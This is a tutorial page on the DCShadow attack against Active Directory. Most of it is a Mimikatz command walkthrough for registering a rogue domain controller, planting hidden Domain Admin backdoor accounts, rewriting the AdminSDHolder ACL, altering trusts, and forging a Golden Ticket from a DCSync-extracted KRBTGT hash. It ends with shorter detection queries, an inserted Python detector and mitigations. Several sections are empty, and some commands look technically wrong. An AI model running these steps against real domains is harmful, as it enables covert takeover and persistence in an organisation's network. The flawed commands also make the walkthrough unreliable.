Objectives

What is DCShadow?

DCShadow is an advanced attack technique that allows an attacker to register a rogue Domain Controller in the domain and push malicious changes into the Active Directory database. Because the changes arrive on the legitimate DCs as replicated data rather than as directory writes, the object-change auditing on those DCs does not record them, which lets the technique bypass most security controls and logging mechanisms.

DCShadow Attack Characteristics:

  • Rogue DC registration: Creates a fake Domain Controller
  • Direct database manipulation: Bypasses normal security controls
  • Stealthy operation: Replicated changes are not audited as directory modifications on the receiving DCs, so little is logged
  • Persistent backdoors: Can create long-term persistence

How DCShadow Works

DCShadow operates by:

  1. Registering a rogue Domain Controller in the domain
  2. Creating a fake replication partner relationship
  3. Pushing malicious changes directly to the AD database
  4. Bypassing normal security controls and auditing

Prerequisites for DCShadow Attack

To perform a DCShadow attack, an attacker needs specific permissions and access.

Required Permissions

The following permissions are required for DCShadow attacks:

System Requirements

DCShadow Attack Implementation

Step 1: Prepare the Attack Environment

Set up the environment for DCShadow attack:

# Verify domain admin access
whoami /groups | findstr "Domain Admins"

# Check domain information
nltest /dsgetdc:corp.local

# Verify network connectivity to DCs
ping dc1.corp.local

Step 2: Register Rogue Domain Controller

Register a rogue Domain Controller using Mimikatz:

# Start Mimikatz with DCShadow module
mimikatz # privilege::debug

# Register rogue DC
mimikatz # lsadump::dcshadow /object:CN=TestDC,CN=Computers,DC=corp,DC=local /attribute:servicePrincipalName /value:"HOST/TestDC.corp.local"

# Set up replication
mimikatz # lsadump::dcshadow /push

Step 3: Create Replication Partnership

Establish replication partnership with legitimate DCs:

# Create replication source
mimikatz # lsadump::dcshadow /object:CN=TestDC,CN=Computers,DC=corp,DC=local /attribute:msDS-NCReplicaLocations /value:"CN=NTDS Settings,CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local"

# Push replication configuration
mimikatz # lsadump::dcshadow /push

Domain Object Manipulation

Once the rogue DC is registered, various domain objects can be manipulated.

1. User Account Manipulation

Modify user accounts to create backdoors:

# Add user to Domain Admins group
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Modify user password
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"NewPassword123!"

# Push changes
mimikatz # lsadump::dcshadow /push

2. Group Membership Manipulation

Modify group memberships for privilege escalation:

# Add user to Enterprise Admins
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Enterprise Admins,CN=Users,DC=corp,DC=local"

# Add user to Schema Admins
mimikatz # lsadump::dcshadow /object:CN=BackdoorUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Schema Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

3. Service Account Manipulation

Modify service accounts for persistence:

# Create new service account
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:objectClass /value:"user"

# Set service account password
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"ServicePassword123!"

# Add to Domain Admins
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

Advanced DCShadow Techniques

1. Cross-Domain DCShadow

Perform DCShadow attacks across trusted domains:

# Register rogue DC in trusted domain
mimikatz # lsadump::dcshadow /object:CN=CrossDomainDC,CN=Computers,DC=trusted,DC=local /attribute:servicePrincipalName /value:"HOST/CrossDomainDC.trusted.local"

# Create cross-domain backdoor
mimikatz # lsadump::dcshadow /object:CN=CrossDomainUser,CN=Users,DC=trusted,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=trusted,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

2. Stealth Backdoor Creation

Create stealthy backdoors that are difficult to detect:

# Create hidden user account
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:objectClass /value:"user"
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"HiddenPassword123!"
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:userAccountControl /value:"66048"

# Add to protected groups
mimikatz # lsadump::dcshadow /object:CN=HiddenUser,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

3. ACL Manipulation

Modify Access Control Lists for persistent access:

# Modify AdminSDHolder ACL
mimikatz # lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=corp,DC=local /attribute:nTSecurityDescriptor /value:"D:AI(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1234567890-1234567890-1234567890-1105)"

# Push ACL changes
mimikatz # lsadump::dcshadow /push

Persistent Backdoor Installation

DCShadow can be used to install various types of persistent backdoors.

1. Golden Ticket Backdoor

Create a Golden Ticket using a KRBTGT hash extracted with DCSync:

# First extract KRBTGT hash using DCSync
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

# Create Golden Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /user:backdoor /ticket:golden.kirbi

# Inject Golden Ticket
mimikatz # kerberos::ptt golden.kirbi

2. Service Account Backdoor

Create service accounts with high privileges:

# Create service account with SPN
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:servicePrincipalName /value:"MSSQLSvc/dbserver.corp.local:1433"

# Set strong password
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:unicodePwd /value:"StrongPassword123!"

# Add to privileged groups
mimikatz # lsadump::dcshadow /object:CN=ServiceAccount,CN=Users,DC=corp,DC=local /attribute:memberOf /value:"CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Push changes
mimikatz # lsadump::dcshadow /push

3. Trust Relationship Backdoor

Modify trust relationships for cross-domain access:

# Modify inter-domain trust
mimikatz # lsadump::dcshadow /object:CN=trusted.local,CN=System,DC=corp,DC=local /attribute:trustDirection /value:"2"

# Add SID filtering bypass
mimikatz # lsadump::dcshadow /object:CN=trusted.local,CN=System,DC=corp,DC=local /attribute:securityIdentifier /value:"S-1-5-21-0987654321-0987654321-0987654321"

# Push changes
mimikatz # lsadump::dcshadow /push

DCShadow Detection and Mitigation

Detection Methods

Detecting DCShadow attacks is challenging but possible through various methods.

1. Event Log Monitoring

# Computer account changes (4742): a host gaining the DRS replication SPN or a GC SPN is being registered as a DC
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4742} | Where-Object {$_.Message -match 'E3514235-4B06-11D1-AB04-00C04FC2DCD2|GC/'}

# Replica source naming context established / removed (4928 / 4929, Directory Service Replication auditing)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4928,4929}

# Directory objects created / deleted (5137 / 5141): server and nTDSDSA objects appearing under CN=Sites and vanishing again
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5137,5141} | Where-Object {$_.Message -match 'nTDSDSA|CN=Servers,'}
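The queries above only list raw events. As an added example that is not part of this page, the Python below applies the same DCShadow indicators to Security event records in a flat dict shape such as a SIEM export might yield: a non-DC computer gaining the DRS replication or GC SPN (4742), a server or nTDSDSA object created under CN=Sites by a non-DC account (5137), and the create-then-delete pattern of a short-lived DC object (5137 followed by 5141). The field names, the sample records and the known-DC list are assumptions.

```python
# SPN prefixes a newly promoted DC acquires: the DRS replication RPC
# interface GUID and the Global Catalog SPN.
REPL_SPN_PREFIXES = ("E3514235-4B06-11D1-AB04-00C04FC2DCD2/", "GC/")
SITES_DN = "CN=SITES,CN=CONFIGURATION,"
TRANSIENT_SECONDS = 3600  # a DC object removed sooner than this is suspicious


def flag_dcshadow(events, known_dcs):
    """Return one alert per suspicious record. events: dicts with EventID, Time
    (seconds) and the fields below (an assumed SIEM export shape, not Windows
    schema names); known_dcs: names of legitimate DCs without the trailing $."""
    known = {d.upper() for d in known_dcs}
    created = {}  # DN of server/nTDSDSA object -> time of its 5137 event
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4742:  # computer account changed
            acct = ev["TargetUserName"].rstrip("$").upper()
            spns = ev.get("ServicePrincipalNames", [])
            if acct not in known and any(
                    s.upper().startswith(REPL_SPN_PREFIXES) for s in spns):
                alerts.append(f"4742 non-DC {acct} gained replication/GC SPN")
        elif eid in (5137, 5141):  # directory object created / deleted
            dn, cls = ev["ObjectDN"].upper(), ev["ObjectClass"]
            subj = ev["SubjectUserName"].rstrip("$").upper()
            if cls not in ("server", "nTDSDSA") or SITES_DN not in dn:
                continue
            if eid == 5137:
                created[dn] = ev["Time"]
                if subj not in known:
                    alerts.append(f"5137 {cls} created under Sites by {subj}")
            elif dn in created and ev["Time"] - created[dn] <= TRANSIENT_SECONDS:
                # Create-then-delete of a DC object is the clean-up signature, flagged whoever deleted it
                alerts.append(f"5141 transient {cls} removed after {ev['Time'] - created[dn]}s: {dn}")
    return alerts


# Constructed sample records; Time is seconds from an arbitrary epoch.
SERVER_DN = ("CN=WKS01,CN=Servers,CN=Default-First-Site-Name,"
             "CN=Sites,CN=Configuration,DC=corp,DC=local")
SAMPLE_EVENTS = [
    {"EventID": 4742, "Time": 100, "TargetUserName": "WKS01$",
     "ServicePrincipalNames": ["HOST/wks01.corp.local", "GC/wks01.corp.local/corp.local"]},
    {"EventID": 5137, "Time": 105, "SubjectUserName": "jdoe",
     "ObjectClass": "server", "ObjectDN": SERVER_DN},
    {"EventID": 5141, "Time": 130, "SubjectUserName": "jdoe",
     "ObjectClass": "server", "ObjectDN": SERVER_DN},
    {"EventID": 4742, "Time": 200, "TargetUserName": "DC1$",  # legitimate DC, no alert
     "ServicePrincipalNames": ["GC/dc1.corp.local/corp.local"]},
]
```

Running `flag_dcshadow(SAMPLE_EVENTS, {"DC1", "DC2"})` yields three alerts: the SPN change on WKS01, the server object created by jdoe, and its removal 25 seconds later.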

2. Network Monitoring

3. Directory Monitoring

Mitigation Strategies

1. Restrict DC Registration

# Remove the ACEs granted to Everyone on the Computers container
dsacls "CN=Computers,DC=corp,DC=local" /R "Everyone"

# Restrict computer account creation
dsacls "CN=Computers,DC=corp,DC=local" /G "DOMAIN\AuthorizedUsers:CCDC;computer"

2. Implement Monitoring

3. Network Segmentation

4. Regular Auditing